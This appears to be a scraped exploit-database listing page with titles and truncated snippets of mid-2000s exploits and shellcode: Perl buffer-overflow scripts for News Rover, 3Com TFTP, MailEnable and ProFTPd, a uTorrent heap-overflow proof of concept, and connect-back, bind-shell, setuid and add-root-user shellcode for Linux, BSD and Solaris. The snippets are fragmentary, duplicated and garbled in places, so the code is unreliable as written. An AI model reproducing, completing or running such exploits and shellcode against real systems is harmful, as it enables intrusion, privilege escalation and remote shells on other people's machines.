PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)
Refcount drops down to 0 // = String gets f...
News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
No description provided by source. !/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected]...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)
3Com TFTP Service 3CTftpSvc 2.0.1 - Long Transporting Mode Perl !/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$A...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
!/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1...
News Rover 12.1 Rev 1 - Stack Overflow (2)
!/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected] ==============================================================================================...
News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
Exploit for unknown platform in category local exploits ========================================================== News Rover 12.1 Rev 1 Remote Stack Overflow Exploit perl ========================================================== !/usr/bin/perl...
News Rover 12.1 Rev 1 - Stack Overflow (2)
News Rover 12.1 Rev 1 - Stack Overflow 2 !/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected]...
MailEnable Professional 2.35 Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl maildisable-v6.pl Mail Enable Professional =v2.35 win32 remote exploit by mu-b - Tue Dec 5 2006 - Tested on: Mail Enable Professional v2.35 win32 Note: timing is quite critical with this!!, so change $senddelay if it doesn't work...
ProFTPd 1.3.0/1.3.0a - mod_ctrls support Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - mod_ctrls support Local Buffer Overflow 2 !/usr/bin/perl -w $Id: revengeproftpdctrls26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $ ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit Original Advisory : http://www.coresecurity.com/?action=item&id=1594 Exploitation condition...
MS07-004 General overflow of the method-completion-bug warning-the black bar safety net
This article MS07-004 as an example, explores this vulnerability of the General method, to restore the ie method, as well as the heap spray technology. The topic is! by axis Date: 2007-02-13 Email: axisatph4nt0m.org MS07-004 out there for some time, I wrote an analysis paper, and for this...
uTorrent 1.6 Remote Heap Overflow Exploit PoC
No description provided by source. / This is a PoC remote exploit for uTorrent 1.6 Author: defsec [email protected] http://www.defacedsecurity.com Works on XP SP1 and w2k sp1-4 / include stdio.h include stdlib.h define NASIZE 4880 unsigned char niceannounceNASIZE;...
ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net
ipb search.php vulnerability analysis and thinking A vulnerability model may unearth a batch of vulnerabilities Idea is the most important pregreplace+/e Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerabilit...
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
/ This is a PoC remote exploit for uTorrent 1.6 Author: defsec http://www.defacedsecurity.com Works on XP SP1 and w2k sp1-4 / include include define NASIZE 4880 unsigned char niceannounceNASIZE; unsigned char xorops="\x33\xc0\x33\xdb"; // win32exec - EXITFUNC=process CMD=calc Size=343...
solaris/sparc connect-back (with XNOR encoded session) 600 bytes
No description provided by source. / black-RXenc-con-back-SOLARIS.c MIPS This is a relitivly small 600 byte shellcode that encodes all network trafic between the exploited process and the attacker. All clear-text shell i/o is encoded using a simple NOT algo before being transmitted on the wire...
linux/x86 add root user r00t with no password to /etc/passwd 69 bytes
No description provided by source. / By Kris Katterjohn 11/14/2006 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86 section .text global start start: ; open"/etc//passwd", OWRONLY | OAPPEND push byte 5 pop eax xor ecx, ecx push ecx push 0x64777373 push...
freebsd/x86 portbind 4883 with auth shellcode
No description provided by source. / THE ZUGCODE - SMALL REMOTE 6ACKD0R FreeBSD i386 bind shell with auth code by MahDelin Big thx SST kaka, nolife, white Listen on the port 4883 the /bin/sh / / void zugcodevoid //socket asm"xorl %eax, %eax"; asm"pushl %eax"; asm"pushl %eax"; asm"pushl $0x01";...
linux/x86 SET_IP() Connectback Shellcode 82 bytes
No description provided by source. /--------------------------------------------------------------------------- 82 byte Connectback shellcode by Benjamin Orozco - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connectback.c...
bsd/x86 setuid/execve shellcode 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. ...
linux/x86 SET_PORT() portbind 100 bytes
No description provided by source. /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco - [email protected] --------------------------------------------------------------------------- filename: x86-linux-portbind.c discription...
bsd/x86 setuid/portbind shellcode 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on...